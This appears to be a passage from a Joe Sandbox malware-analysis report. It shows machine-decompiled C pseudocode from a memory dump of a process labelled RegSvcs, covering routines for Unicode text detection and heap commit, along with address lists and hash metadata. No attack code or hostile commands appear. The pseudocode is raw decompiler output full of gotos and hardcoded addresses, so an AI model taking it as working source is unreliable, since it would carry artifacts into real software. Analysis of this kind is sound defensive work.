                                          				unsigned int _t233;
                                          				unsigned int _t237;
                                          				signed int _t238;
                                          				unsigned int _t239;
                                          				signed int _t240;
                                          				signed int _t254;
                                          				signed int _t255;
                                          				signed int _t256;
                                          				signed int _t257;
                                          				unsigned int _t258;
                                          				void* _t261;
                                          
                                          				_t213 = _a8;
                                          				_t159 = 0;
                                          				_v60 = 0;
                                          				_t237 = _t213 >> 1;
                                          				_t210 = 0;
                                          				_t257 = 0;
                                          				_v56 = 0;
                                          				_v52 = 0;
                                          				_v44 = 0;
                                          				_v48 = 0;
                                          				_v92 = 0;
                                          				_v88 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				_v64 = 0;
                                          				_v68 = 0;
                                          				_v24 = 0;
                                          				_v80 = 0;
                                          				_v84 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v20 = 0;
                                          				_v12 = 0;
                                          				_v16 = 0;
                                          				_v100 = _t237;
                                          				if(_t237 > 0x100) {
                                          					_t254 = 0x100;
                                          					_v36 = 0x100;
                                          					L2:
                                          					_t261 = _t213 - 2;
                                          					if(_t261 == 0) {
                                          						_t214 = _a4;
                                          						_t160 =  *_t214 & 0x0000ffff;
                                          						__eflags = _t160;
                                          						if(_t160 == 0) {
                                          							L108:
                                          							_t159 = 0;
                                          							L8:
                                          							_t238 = 0;
                                          							_v96 = 0;
                                          							if(_t254 == 0) {
                                          								L30:
                                          								_v24 = _t159 - 1;
                                          								goto L31;
                                          							} else {
                                          								goto L11;
                                          								L13:
                                          								_t224 = _t223 >> 8;
                                          								_v40 = _t224;
                                          								_t256 = _t224 & 0x000000ff;
                                          								_t196 = _a4[_t238];
                                          								_v5 = _t196;
                                          								_t197 = _t196 & 0x000000ff;
                                          								if(_t197 == 0xd) {
                                          									__eflags = _t257 - 0xa;
                                          									if(_t257 == 0xa) {
                                          										_v12 = _v12 + 1;
                                          									}
                                          								} else {
                                          									if(_t197 == 0xa) {
                                          										__eflags = _t257 - 0xd;
                                          										if(_t257 == 0xd) {
                                          											_v12 = _v12 + 1;
                                          										}
                                          									}
                                          								}
                                          								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
                                          								if(_t256 > _t257) {
                                          									_t229 = _t256;
                                          								} else {
                                          									_t229 = _t257;
                                          								}
                                          								if(_t257 >= _t256) {
                                          									_t257 = _t256;
                                          								}
                                          								_v28 = _v28 + _t229 - _t257;
                                          								_t231 = _t197;
                                          								if(_t197 <= _t210) {
                                          									_t231 = _t210;
                                          								}
                                          								if(_t210 >= _t197) {
                                          									_t210 = _t197;
                                          								}
                                          								_v32 = _v32 + _t231 - _t210;
                                          								_t238 = _v96 + 1;
                                          								_t210 = _t197;
                                          								_t257 = _t256;
                                          								_v96 = _t238;
                                          								if(_t238 < _v36) {
                                          									_t214 = _a4;
                                          									L11:
                                          									_t223 = _t214[_t238] & 0x0000ffff;
                                          									_t193 = _t223 & 0x0000ffff;
                                          									if(_t193 >= 0x900 || _t193 < 0x21) {
                                          										goto L58;
                                          									} else {
                                          										goto L13;
                                          									}
                                          								}
                                          								_t198 = _v5;
                                          								if(_t198 == 0xd) {
                                          									_t199 = _v40;
                                          									__eflags = _t199 - 0xa;
                                          									if(_t199 != 0xa) {
                                          										L27:
                                          										_t233 = _v12;
                                          										L28:
                                          										if(_t199 != 0) {
                                          											__eflags = _t199 - 0x1a;
                                          											if(_t199 == 0x1a) {
                                          												_v12 = _t233 + 1;
                                          											}
                                          											L31:
                                          											_t162 = _a8;
                                          											if(_t162 > 0x200) {
                                          												_t255 = 0x200;
                                          											} else {
                                          												_t255 = _t162;
                                          											}
                                          											_t215 =  *0x13e6d59; // 0x0
                                          											if(_t215 != 0) {
                                          												_t239 = 0;
                                          												__eflags = _t255;
                                          												if(_t255 == 0) {
                                          													goto L34;
                                          												} else {
                                          													goto L119;
                                          												}
                                          												do {
                                          													L119:
                                          													_t192 =  *(_a4 + _t239) & 0x000000ff;
                                          													__eflags =  *((short*)(0x13e6920 + _t192 * 2));
                                          													_t163 = _v20;
                                          													if( *((short*)(0x13e6920 + _t192 * 2)) != 0) {
                                          														_t163 = _t163 + 1;
                                          														_t239 = _t239 + 1;
                                          														__eflags = _t239;
                                          														_v20 = _t163;
                                          													}
                                          													_t239 = _t239 + 1;
                                          													__eflags = _t239 - _t255;
                                          												} while (_t239 < _t255);
                                          												goto L35;
                                          											} else {
                                          												L34:
                                          												_t163 = 0;
                                          												L35:
                                          												_t240 = _v32;
                                          												_t211 = _v28;
                                          												if(_t240 < 0x7f) {
                                          													__eflags = _t211;
                                          													if(_t211 != 0) {
                                          														L37:
                                          														if(_t240 == 0) {
                                          															_v16 = 0x10;
                                          														}
                                          														L38:
                                          														_t258 = _a12;
                                          														if(_t215 != 0) {
                                          															__eflags = _t163;
                                          															if(_t163 == 0) {
                                          																goto L39;
                                          															}
                                          															__eflags = _t258;
                                          															if(_t258 == 0) {
                                          																goto L39;
                                          															}
                                          															__eflags =  *_t258 & 0x00000400;
                                          															if(( *_t258 & 0x00000400) == 0) {
                                          																goto L39;
                                          															}
                                          															_t218 = _v100;
                                          															__eflags = _t218 - 0x100;
                                          															if(_t218 > 0x100) {
                                          																_t218 = 0x100;
                                          															}
                                          															_t220 = (_t218 >> 1) - 1;
                                          															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
                                          															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
                                          																_t221 = _t220 + _t220;
                                          																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
                                          																asm("sbb ecx, ecx");
                                          																_t216 =  ~_t221 + 1;
                                          																__eflags = _t216;
                                          															} else {
                                          																_t216 = 3;
                                          															}
                                          															_v16 = _v16 | 0x00000400;
                                          															_t240 = _v32;
                                          															L40:
                                          															if(_t211 * _t216 < _t240) {
                                          																_v16 = _v16 | 0x00000002;
                                          															}
                                          															_t217 = _v16;
                                          															if(_t240 * _t216 < _t211) {
                                          																_t217 = _t217 | 0x00000020;
                                          															}
                                          															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
                                          																_t217 = _t217 | 0x00000004;
                                          															}
                                          															if(_v64 + _v68 + _v72 + _v76 != 0) {
                                          																_t217 = _t217 | 0x00000040;
                                          															}
                                          															if(_v80 + _v84 + _v88 + _v92 == 0) {
                                          																_t212 = _v12;
                                          																__eflags = _t212;
                                          																if(_t212 == 0) {
                                          																	goto L48;
                                          																}
                                          																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
                                          																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
                                          																	goto L47;
                                          																}
                                          																goto L48;
                                          															} else {
                                          																L47:
                                          																_t217 = _t217 | 0x00000100;
                                          																L48:
                                          																if((_a8 & 0x00000001) != 0) {
                                          																	_t217 = _t217 | 0x00000200;
                                          																}
                                          																if(_v24 != 0) {
                                          																	_t217 = _t217 | 0x00001000;
                                          																}
                                          																_t180 =  *_a4 & 0x0000ffff;
                                          																if(_t180 != 0xfeff) {
                                          																	__eflags = _t180 - 0xfffe;
                                          																	if(_t180 == 0xfffe) {
                                          																		_t217 = _t217 | 0x00000080;
                                          																	}
                                          																} else {
                                          																	_t217 = _t217 | 0x00000008;
                                          																}
                                          																if(_t258 != 0) {
                                          																	 *_t258 =  *_t258 & _t217;
                                          																	_t217 =  *_t258;
                                          																}
                                          																if((_t217 & 0x00000b08) != 8) {
                                          																	__eflags = _t217 & 0x000000f0;
                                          																	if((_t217 & 0x000000f0) != 0) {
                                          																		L84:
                                          																		return 0;
                                          																	}
                                          																	__eflags = _t217 & 0x00000f00;
                                          																	if((_t217 & 0x00000f00) == 0) {
                                          																		__eflags = _t217 & 0x0000f00f;
                                          																		if((_t217 & 0x0000f00f) == 0) {
                                          																			goto L84;
                                          																		}
                                          																		goto L56;
                                          																	}
                                          																	goto L84;
                                          																} else {
                                          																	L56:
                                          																	return 1;
                                          																}
                                          															}
                                          														}
                                          														L39:
                                          														_t216 = 3;
                                          														goto L40;
                                          													}
                                          													_v16 = 1;
                                          													goto L38;
                                          												}
                                          												if(_t211 == 0) {
                                          													goto L38;
                                          												}
                                          												goto L37;
                                          											}
                                          										} else {
                                          											_t159 = _v24;
                                          											goto L30;
                                          										}
                                          									}
                                          									L104:
                                          									_t233 = _v12 + 1;
                                          									_v12 = _t233;
                                          									goto L28;
                                          								}
                                          								_t199 = _v40;
                                          								if(_t198 != 0xa || _t199 != 0xd) {
                                          									goto L27;
                                          								} else {
                                          									goto L104;
                                          								}
                                          								L58:
                                          								__eflags = _t193 - 0x3001;
                                          								if(_t193 < 0x3001) {
                                          									L60:
                                          									__eflags = _t193 - 0xd00;
                                          									if(__eflags > 0) {
                                          										__eflags = _t193 - 0x3000;
                                          										if(__eflags > 0) {
                                          											_t194 = _t193 - 0xfeff;
                                          											__eflags = _t194;
                                          											if(_t194 != 0) {
                                          												_t200 = _t194 - 0xff;
                                          												__eflags = _t200;
                                          												if(_t200 == 0) {
                                          													_v88 = _v88 + 1;
                                          												} else {
                                          													__eflags = _t200 == 1;
                                          													if(_t200 == 1) {
                                          														_v92 = _v92 + 1;
                                          													}
                                          												}
                                          											}
                                          										} else {
                                          											if(__eflags == 0) {
                                          												_v48 = _v48 + 1;
                                          											} else {
                                          												_t202 = _t193 - 0x2000;
                                          												__eflags = _t202;
                                          												if(_t202 == 0) {
                                          													_v68 = _v68 + 1;
                                          												}
                                          											}
                                          										}
                                          										goto L13;
                                          									}
                                          									if(__eflags == 0) {
                                          										_v76 = _v76 + 1;
                                          										goto L13;
                                          									}
                                          									__eflags = _t193 - 0x20;
                                          									if(__eflags > 0) {
                                          										_t204 = _t193 - 0x900;
                                          										__eflags = _t204;
                                          										if(_t204 == 0) {
                                          											_v64 = _v64 + 1;
                                          										} else {
                                          											_t205 = _t204 - 0x100;
                                          											__eflags = _t205;
                                          											if(_t205 == 0) {
                                          												_v72 = _v72 + 1;
                                          											} else {
                                          												__eflags = _t205 == 0xd;
                                          												if(_t205 == 0xd) {
                                          													_v84 = _v84 + 1;
                                          												}
                                          											}
                                          										}
                                          										goto L13;
                                          									}
                                          									if(__eflags == 0) {
                                          										_v44 = _v44 + 1;
                                          										goto L13;
                                          									}
                                          									__eflags = _t193 - 0xd;
                                          									if(_t193 > 0xd) {
                                          										goto L13;
                                          									}
                                          									_t84 = _t193 + 0x12f1174; // 0x4040400
                                          									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M012F1160))) {
                                          										case 0:
                                          											_v80 = _v80 + 1;
                                          											goto L13;
                                          										case 1:
                                          											_v52 = _v52 + 1;
                                          											goto L13;
                                          										case 2:
                                          											_v56 = _v56 + 1;
                                          											goto L13;
                                          										case 3:
                                          											_v60 = _v60 + 1;
                                          											goto L13;
                                          										case 4:
                                          											goto L13;
                                          									}
                                          								}
                                          								__eflags = _t193 - 0xfeff;
                                          								if(_t193 < 0xfeff) {
                                          									goto L13;
                                          								}
                                          								goto L60;
                                          							}
                                          						}
                                          						__eflags = _t160 >> 8;
                                          						if(_t160 >> 8 == 0) {
                                          							L101:
                                          							_t209 = _a12;
                                          							__eflags = _t209;
                                          							if(_t209 != 0) {
                                          								 *_t209 = 5;
                                          							}
                                          							goto L84;
                                          						}
                                          						goto L108;
                                          					}
                                          					if(_t261 <= 0 || _t237 > 0x100) {
                                          						_t214 = _a4;
                                          					} else {
                                          						_t214 = _a4;
                                          						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
                                          							_t254 = _t254 - 1;
                                          							_v36 = _t254;
                                          						}
                                          					}
                                          					goto L8;
                                          				}
                                          				_t254 = _t237;
                                          				_v36 = _t254;
                                          				if(_t254 == 0) {
                                          					goto L101;
                                          				}
                                          				goto L2;
                                          			}






































































                                          0x012f0f09
                                          0x0134ea63
                                          0x00000000
                                          0x0134ea63
                                          0x012f0ef4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0ef4
                                          0x012f0ebc
                                          0x012f0ebc
                                          0x00000000
                                          0x012f0ebc
                                          0x012f0eb6
                                          0x012f1149
                                          0x012f114c
                                          0x012f114d
                                          0x00000000
                                          0x012f114d
                                          0x012f0ea4
                                          0x012f0ea7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0fb7
                                          0x012f0fb7
                                          0x012f0fbc
                                          0x012f0fc9
                                          0x012f0fc9
                                          0x012f0fce
                                          0x012f1020
                                          0x012f1025
                                          0x012f1094
                                          0x012f1094
                                          0x012f1099
                                          0x0134ea04
                                          0x0134ea04
                                          0x0134ea09
                                          0x0134ea1c
                                          0x0134ea0b
                                          0x0134ea0b
                                          0x0134ea0e
                                          0x0134ea14
                                          0x0134ea14
                                          0x0134ea0e
                                          0x0134ea09
                                          0x012f1027
                                          0x012f1027
                                          0x012f1155
                                          0x012f102d
                                          0x012f102d
                                          0x012f102d
                                          0x012f1032
                                          0x0134e9fc
                                          0x0134e9fc
                                          0x012f1032
                                          0x012f1027
                                          0x00000000
                                          0x012f1025
                                          0x012f0fd0
                                          0x0134e9f4
                                          0x00000000
                                          0x0134e9f4
                                          0x012f0fd6
                                          0x012f0fd9
                                          0x012f1059
                                          0x012f1059
                                          0x012f105e
                                          0x0134e9ec
                                          0x012f1064
                                          0x012f1064
                                          0x012f1064
                                          0x012f1069
                                          0x012f10ac
                                          0x012f106b
                                          0x012f106b
                                          0x012f106e
                                          0x012f1074
                                          0x012f1074
                                          0x012f106e
                                          0x012f1069
                                          0x00000000
                                          0x012f105e
                                          0x012f0fdb
                                          0x012f10a4
                                          0x00000000
                                          0x012f10a4
                                          0x012f0fe1
                                          0x012f0fe4
                                          0x00000000
                                          0x00000000
                                          0x012f0fea
                                          0x012f0ff1
                                          0x00000000
                                          0x012f0ff8
                                          0x00000000
                                          0x00000000
                                          0x0134e9e4
                                          0x00000000
                                          0x00000000
                                          0x012f1018
                                          0x00000000
                                          0x00000000
                                          0x012f1051
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0ff1
                                          0x012f0fbe
                                          0x012f0fc3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0fc3
                                          0x012f0df3
                                          0x0134e9d5
                                          0x0134e9d7
                                          0x012f1128
                                          0x012f1128
                                          0x012f112b
                                          0x012f112d
                                          0x012f1133
                                          0x012f1133
                                          0x00000000
                                          0x012f112d
                                          0x00000000
                                          0x0134e9d7
                                          0x012f0dc2
                                          0x012f10f6
                                          0x012f0dd4
                                          0x012f0dd7
                                          0x012f0dda
                                          0x012f0de8
                                          0x012f0de9
                                          0x012f0de9
                                          0x012f0dda
                                          0x00000000
                                          0x012f0dc2
                                          0x012f0dac
                                          0x012f0dae
                                          0x012f0db3
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83d4e74ab35f972607948d7f7266bca36cec1233cec7b497073bc4117d2bbf90
                                          • Instruction ID: 26aae9bfce3e475a12adc5237b171bec3fd100f8bc39d57ded25505e63c90635
                                          • Opcode Fuzzy Hash: 83d4e74ab35f972607948d7f7266bca36cec1233cec7b497073bc4117d2bbf90
                                          • Instruction Fuzzy Hash: 8ED1B231E2424ACBEB288E9CC5517BDFBB2FB44304F54413DEB42A7286D7789991CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0131B236(signed int __ecx, intOrPtr __edx) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				unsigned int _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				unsigned int _t94;
                                          				signed int _t96;
                                          				intOrPtr _t97;
                                          				unsigned int _t101;
                                          				char _t103;
                                          				signed int _t114;
                                          				signed int _t115;
                                          				signed char* _t118;
                                          				intOrPtr _t119;
                                          				signed int _t120;
                                          				signed char* _t123;
                                          				signed int _t129;
                                          				char* _t132;
                                          				unsigned int _t147;
                                          				signed int _t157;
                                          				unsigned int _t158;
                                          				signed int _t159;
                                          				signed int _t165;
                                          				signed int _t168;
                                          				signed char _t175;
                                          				signed char _t185;
                                          				unsigned int _t197;
                                          				unsigned int _t206;
                                          				unsigned int* _t214;
                                          				signed int _t218;
                                          
                                          				_t156 = __edx;
                                          				_v24 = __edx;
                                          				_t218 = __ecx;
                                          				_t3 = _t156 + 0xfff; // 0xfff
                                          				_t210 = 0;
                                          				_v16 = _t3 & 0xfffff000;
                                          				if(E0131B477(__ecx,  &_v16) == 0) {
                                          					__eflags =  *(__ecx + 0x40) & 0x00000002;
                                          					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
                                          						L32:
                                          						__eflags =  *(_t218 + 0x40) & 0x00000080;
                                          						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
                                          							_t210 = E0139CB4F(_t218);
                                          							__eflags = _t210;
                                          							if(_t210 == 0) {
                                          								goto L33;
                                          							}
                                          							__eflags = ( *_t210 & 0x0000ffff) - _t156;
                                          							if(( *_t210 & 0x0000ffff) < _t156) {
                                          								goto L33;
                                          							}
                                          							_t157 = _t210;
                                          							goto L3;
                                          						}
                                          						L33:
                                          						_t157 = 0;
                                          						__eflags = _t210;
                                          						if(_t210 != 0) {
                                          							__eflags =  *(_t218 + 0x4c);
                                          							if( *(_t218 + 0x4c) != 0) {
                                          								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
                                          								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
                                          							}
                                          						}
                                          						goto L3;
                                          					}
                                          					_v12 = _v12 & 0;
                                          					_t158 = __edx + 0x2000;
                                          					_t94 =  *((intOrPtr*)(__ecx + 0x64));
                                          					__eflags = _t158 - _t94;
                                          					if(_t158 > _t94) {
                                          						_t94 = _t158;
                                          					}
                                          					__eflags =  *((char*)(_t218 + 0xda)) - 2;
                                          					if( *((char*)(_t218 + 0xda)) != 2) {
                                          						_t165 = 0;
                                          					} else {
                                          						_t165 =  *(_t218 + 0xd4);
                                          					}
                                          					__eflags = _t165;
                                          					if(_t165 == 0) {
                                          						__eflags = _t94 - 0x3f4000;
                                          						if(_t94 >= 0x3f4000) {
                                          							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
                                          						}
                                          					}
                                          					_t96 = _t94 + 0x0000ffff & 0xffff0000;
                                          					_v8 = _t96;
                                          					__eflags = _t96 - 0xfd0000;
                                          					if(_t96 >= 0xfd0000) {
                                          						_v8 = 0xfd0000;
                                          					}
                                          					_t97 = E01320678(_t218, 1);
                                          					_push(_t97);
                                          					_push(0x2000);
                                          					_v28 = _t97;
                                          					_push( &_v8);
                                          					_push(0);
                                          					_push( &_v12);
                                          					_push(0xffffffff);
                                          					_t168 = E01339660();
                                          					__eflags = _t168;
                                          					if(_t168 < 0) {
                                          						while(1) {
                                          							_t101 = _v8;
                                          							__eflags = _t101 - _t158;
                                          							if(_t101 == _t158) {
                                          								break;
                                          							}
                                          							_t147 = _t101 >> 1;
                                          							_v8 = _t147;
                                          							__eflags = _t147 - _t158;
                                          							if(_t147 < _t158) {
                                          								_v8 = _t158;
                                          							}
                                          							_push(_v28);
                                          							_push(0x2000);
                                          							_push( &_v8);
                                          							_push(0);
                                          							_push( &_v12);
                                          							_push(0xffffffff);
                                          							_t168 = E01339660();
                                          							__eflags = _t168;
                                          							if(_t168 < 0) {
                                          								continue;
                                          							} else {
                                          								_t101 = _v8;
                                          								break;
                                          							}
                                          						}
                                          						__eflags = _t168;
                                          						if(_t168 >= 0) {
                                          							goto L12;
                                          						}
                                          						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
                                          						goto L60;
                                          					} else {
                                          						_t101 = _v8;
                                          						L12:
                                          						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
                                          						_t103 = _v24 + 0x1000;
                                          						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
                                          						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
                                          							_t103 =  *((intOrPtr*)(_t218 + 0x68));
                                          						}
                                          						_push(_v28);
                                          						_v20 = _t103;
                                          						_push(0x1000);
                                          						_push( &_v20);
                                          						_push(0);
                                          						_push( &_v12);
                                          						_push(0xffffffff);
                                          						_t159 = E01339660();
                                          						__eflags = _t159;
                                          						if(_t159 < 0) {
                                          							L59:
                                          							E0132174B( &_v12,  &_v8, 0x8000);
                                          							L60:
                                          							_t156 = _v24;
                                          							goto L32;
                                          						} else {
                                          							_t114 = E0132138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
                                          							__eflags = _t114;
                                          							if(_t114 == 0) {
                                          								_t159 = 0xc0000017;
                                          							}
                                          							__eflags = _t159;
                                          							if(_t159 < 0) {
                                          								goto L59;
                                          							} else {
                                          								_t115 = E01317D50();
                                          								_t212 = 0x7ffe0380;
                                          								__eflags = _t115;
                                          								if(_t115 != 0) {
                                          									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								} else {
                                          									_t118 = 0x7ffe0380;
                                          								}
                                          								__eflags =  *_t118;
                                          								if( *_t118 != 0) {
                                          									_t119 =  *[fs:0x30];
                                          									__eflags =  *(_t119 + 0x240) & 0x00000001;
                                          									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
                                          										E013B138A(0x226, _t218, _v12, _v20, 4);
                                          										__eflags = E01317D50();
                                          										if(__eflags != 0) {
                                          											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										}
                                          										E013B1582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
                                          									}
                                          								}
                                          								_t120 = E01317D50();
                                          								_t213 = 0x7ffe038a;
                                          								__eflags = _t120;
                                          								if(_t120 != 0) {
                                          									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          								} else {
                                          									_t123 = 0x7ffe038a;
                                          								}
                                          								__eflags =  *_t123;
                                          								if( *_t123 != 0) {
                                          									__eflags = E01317D50();
                                          									if(__eflags != 0) {
                                          										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          									}
                                          									E013B1582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
                                          								}
                                          								_t129 = E01317D50();
                                          								__eflags = _t129;
                                          								if(_t129 != 0) {
                                          									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          								} else {
                                          									_t132 = 0x7ffe0388;
                                          								}
                                          								__eflags =  *_t132;
                                          								if( *_t132 != 0) {
                                          									E013AFEC0(0x230, _t218, _v12, _v8);
                                          								}
                                          								__eflags =  *(_t218 + 0x4c);
                                          								_t214 =  *(_v12 + 0x24);
                                          								if( *(_t218 + 0x4c) != 0) {
                                          									_t197 =  *(_t218 + 0x50) ^  *_t214;
                                          									 *_t214 = _t197;
                                          									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
                                          									__eflags = _t197 >> 0x18 - _t175;
                                          									if(__eflags != 0) {
                                          										_push(_t175);
                                          										E013AFA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
                                          									}
                                          								}
                                          								_t157 =  *(_v12 + 0x24);
                                          								goto L3;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_v16 = _v16 >> 3;
                                          					_t157 = E013199BF(__ecx, _t87,  &_v16, 0);
                                          					E0131A830(__ecx, _t157, _v16);
                                          					if( *(_t218 + 0x4c) != 0) {
                                          						_t206 =  *(_t218 + 0x50) ^  *_t157;
                                          						 *_t157 = _t206;
                                          						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
                                          						if(_t206 >> 0x18 != _t185) {
                                          							_push(_t185);
                                          							E013AFA2B(_t157, _t218, _t157, 0, _t218, __eflags);
                                          						}
                                          					}
                                          					L3:
                                          					return _t157;
                                          				}
                                          			}






































                                          0x013627e6
                                          0x013627e7
                                          0x013627ee
                                          0x013627f0
                                          0x013627f2
                                          0x00000000
                                          0x013627f4
                                          0x013627f4
                                          0x00000000
                                          0x013627f4
                                          0x013627f2
                                          0x013627f7
                                          0x013627f9
                                          0x00000000
                                          0x00000000
                                          0x013627ff
                                          0x00000000
                                          0x0131b333
                                          0x0131b333
                                          0x0131b336
                                          0x0131b336
                                          0x0131b33c
                                          0x0131b341
                                          0x0131b344
                                          0x0131b44e
                                          0x0131b44e
                                          0x0131b34a
                                          0x0131b34d
                                          0x0131b353
                                          0x0131b358
                                          0x0131b359
                                          0x0131b35e
                                          0x0131b35f
                                          0x0131b366
                                          0x0131b368
                                          0x0131b36a
                                          0x013628f2
                                          0x013628fe
                                          0x01362903
                                          0x01362903
                                          0x00000000
                                          0x0131b370
                                          0x0131b38c
                                          0x0131b391
                                          0x0131b393
                                          0x0136280a
                                          0x0136280a
                                          0x0131b399
                                          0x0131b39b
                                          0x00000000
                                          0x0131b3a1
                                          0x0131b3a1
                                          0x0131b3a6
                                          0x0131b3b0
                                          0x0131b3b2
                                          0x0136281d
                                          0x0131b3b8
                                          0x0131b3b8
                                          0x0131b3b8
                                          0x0131b3ba
                                          0x0131b3bd
                                          0x01362824
                                          0x0136282a
                                          0x01362831
                                          0x01362841
                                          0x0136284b
                                          0x0136284d
                                          0x01362858
                                          0x01362858
                                          0x01362858
                                          0x01362870
                                          0x01362870
                                          0x01362831
                                          0x0131b3c3
                                          0x0131b3c8
                                          0x0131b3d2
                                          0x0131b3d4
                                          0x01362883
                                          0x0131b3da
                                          0x0131b3da
                                          0x0131b3da
                                          0x0131b3dc
                                          0x0131b3df
                                          0x0136288f
                                          0x01362891
                                          0x0136289c
                                          0x0136289c
                                          0x0136289c
                                          0x013628b4
                                          0x013628b4
                                          0x0131b3e5
                                          0x0131b3ea
                                          0x0131b3ec
                                          0x013628c7
                                          0x0131b3f2
                                          0x0131b3f2
                                          0x0131b3f2
                                          0x0131b3f7
                                          0x0131b3fa
                                          0x013628d9
                                          0x013628d9
                                          0x0131b400
                                          0x0131b407
                                          0x0131b40a
                                          0x0131b40f
                                          0x0131b413
                                          0x0131b41f
                                          0x0131b424
                                          0x0131b426
                                          0x013628e3
                                          0x013628e8
                                          0x013628e8
                                          0x0131b426
                                          0x0131b42f
                                          0x00000000
                                          0x0131b42f
                                          0x0131b39b
                                          0x0131b36a
                                          0x0131b264
                                          0x0131b264
                                          0x0131b279
                                          0x0131b27f
                                          0x0131b287
                                          0x0131b28c
                                          0x0131b290
                                          0x0131b29c
                                          0x0131b2a3
                                          0x013627a0
                                          0x013627a5
                                          0x013627a5
                                          0x0131b2a3
                                          0x0131b2a9
                                          0x0131b2b1
                                          0x0131b2b1

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                          • Instruction ID: c147e695703d16a94fbd0ecd85b735833e9a5193f4bcde22813f1d2768bd4a58
                                          • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                          • Instruction Fuzzy Hash: 24B1C331B0060A9FDB19DBA9C890BBFBBF9AF88308F154569E641D7789DB30D901CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E0130849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                          				void* _t136;
                                          				signed int _t139;
                                          				signed int _t141;
                                          				signed int _t145;
                                          				intOrPtr _t146;
                                          				signed int _t149;
                                          				signed int _t150;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t165;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				signed int _t194;
                                          				signed int _t200;
                                          				void* _t201;
                                          				signed int _t204;
                                          				signed int _t206;
                                          				signed int _t210;
                                          				signed int _t214;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				void* _t221;
                                          				signed int _t224;
                                          				signed int _t226;
                                          				intOrPtr _t228;
                                          				signed int _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				void* _t237;
                                          				void* _t238;
                                          
                                          				_t236 = __esi;
                                          				_t235 = __edi;
